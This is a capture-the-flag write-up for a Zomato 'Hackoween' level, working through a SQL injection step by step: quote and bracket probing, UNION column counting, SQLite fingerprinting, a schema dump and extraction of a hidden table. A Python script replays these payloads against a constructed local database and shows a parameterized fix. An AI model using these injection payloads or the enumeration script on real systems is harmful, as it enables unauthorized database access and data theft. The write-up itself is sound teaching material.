Level 9 – Hackoween II #ZomatoCTF


Vaccine good or bad?

This level had a button that submits a GET request to a page with the parameter uuid=test.

Changing the value of uuid in the URL to uuid=test' gave a 500 Internal Server Error.

uuid=test'' (a doubled quote, which SQL reads as an escaped literal quote) gave the same result as the original parameter test, with no error.

So this is SQL injection: a stray quote breaks the query, an escaped one does not.

uuid=nope' or 1=1)-- a returned every row, one of which carried a message saying this is not the right table.

Next I checked whether any brackets had to be closed before the injected clause:
uuid=test'-- a -> 500 Internal Server Error
uuid=test')-- a -> 200 OK
uuid=test'))-- a -> 500 Internal Server Error

So exactly one bracket had to be closed to make the query valid.

Then I moved on to UNION injection, first counting the columns returned by the query.

uuid=nope') UNION SELECT 1 -- a -> 500 Internal Server Error

uuid=nope') UNION SELECT 1,2 -- a -> 500 Internal Server Error

uuid=nope') UNION SELECT 1,2,3 -- a -> 200 OK

[{"uuid":"1","name":"2","code":"3"}]

So 3 columns.

uuid=nope') UNION SELECT @@version,version(),sqlite_version() -- a

[{"uuid":"","name":"","code":"3.42.0"}]

Only the sqlite_version() column came back populated, so the backend is SQLite 3.42.0.

uuid=nope') UNION SELECT 1,2,sql FROM sqlite_schema -- a

The sql column listed the schema, which revealed another table, hidden_details, with the same structure as the original table.

uuid=nope') UNION SELECT uuid, name, code FROM hidden_details WHERE name LIKE 'HackoWeen%'-- a

And we got the code. Submitting it gives the flag.
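To make the enumeration above reproducible offline, here is an added example (my own code, not the challenge's or the writeup's) that rebuilds the vulnerable query pattern against an in-memory SQLite database and replays each step: bracket probing, column counting, fingerprinting, schema dump and the final read from hidden_details, beside a parameterized version of the same lookup. The vaccines table, its rows and the code value are constructed; only hidden_details, the uuid/name/code columns and the 'HackoWeen%' filter come from the writeup.

```python
import sqlite3

# Constructed sample database (not the CTF's real data). The table the app queries,
# its column names and every row value are assumptions; only hidden_details, the
# uuid/name/code columns and the 'HackoWeen%' filter come from the writeup.
SCHEMA = """
CREATE TABLE vaccines (uuid TEXT, name TEXT, code TEXT);
INSERT INTO vaccines VALUES ('test', 'Covishield', 'wrong table'),
                            ('demo', 'Covaxin', 'wrong table');
CREATE TABLE hidden_details (uuid TEXT, name TEXT, code TEXT);
INSERT INTO hidden_details VALUES ('h1', 'Decoy', 'nothing'),
                                  ('h2', 'HackoWeen code', 'HW-CODE-42');
"""
COLUMNS = ("uuid", "name", "code")


def connect():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_lookup(con, uuid):
    """The bug: the uuid parameter is pasted into the SQL text. The extra pair of
    parentheses reproduces the single ')' that had to be closed in the challenge."""
    query = f"SELECT uuid, name, code FROM vaccines WHERE (uuid = '{uuid}')"
    try:
        rows = con.execute(query).fetchall()
    except sqlite3.Error as err:          # any SQL error surfaces as the app's 500
        return 500, str(err)
    return 200, [dict(zip(COLUMNS, row)) for row in rows]


def safe_lookup(con, uuid):
    """The fix: a bound parameter. The same payloads are just a uuid that matches nothing."""
    rows = con.execute(
        "SELECT uuid, name, code FROM vaccines WHERE (uuid = ?)", (uuid,)
    ).fetchall()
    return 200, [dict(zip(COLUMNS, row)) for row in rows]


def find_bracket_depth(con, max_depth=4):
    """Replays test'-- a, test')-- a, test'))-- a: the first depth that yields 200."""
    for depth in range(max_depth + 1):
        status, _ = vulnerable_lookup(con, "test'" + ")" * depth + "-- a")
        if status == 200:
            return depth
    return None


def count_columns(con, depth, max_cols=10):
    """UNION SELECT 1 / 1,2 / 1,2,3 ... until the column counts match (200 OK)."""
    close = ")" * depth
    for n in range(1, max_cols + 1):
        placeholders = ",".join(str(i) for i in range(1, n + 1))
        status, _ = vulnerable_lookup(con, f"nope'{close} UNION SELECT {placeholders} -- a")
        if status == 200:
            return n
    return None


def fingerprint(con, depth):
    """sqlite_version() is the only one of the writeup's three probes SQLite knows;
    its value lands in the third (code) column."""
    close = ")" * depth
    status, body = vulnerable_lookup(con, f"nope'{close} UNION SELECT 1,2,sqlite_version() -- a")
    return body[0]["code"] if status == 200 and body else None


def dump_schema(con, depth):
    """Pull the CREATE statements out of sqlite_master (sqlite_schema, used in the
    writeup, is its alias since SQLite 3.33; sqlite_master works on every version)."""
    close = ")" * depth
    status, body = vulnerable_lookup(con, f"nope'{close} UNION SELECT 1,2,sql FROM sqlite_master -- a")
    return [row["code"] for row in body] if status == 200 else []


def read_hidden_code(con, depth):
    """The final payload from the writeup, run against the constructed hidden_details table."""
    close = ")" * depth
    payload = (f"nope'{close} UNION SELECT uuid, name, code FROM hidden_details "
               "WHERE name LIKE 'HackoWeen%'-- a")
    status, body = vulnerable_lookup(con, payload)
    return body[0]["code"] if status == 200 and body else None


if __name__ == "__main__":
    con = connect()
    depth = find_bracket_depth(con)
    print("brackets to close:", depth)
    print("columns:", count_columns(con, depth))
    print("sqlite version:", fingerprint(con, depth))
    for stmt in dump_schema(con, depth):
        print("schema:", stmt)
    print("code:", read_hidden_code(con, depth))
    print("same payload, parameterized:", safe_lookup(con, "nope' or 1=1)-- a"))
```

The 500-on-error behaviour is what turns this into an oracle: every probe is classified by whether SQLite accepted the statement, which is all the bracket and column counting needs. The parameterized lookup at the end shows the same strings being treated as data, which is the only fix that holds regardless of what the caller sends.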
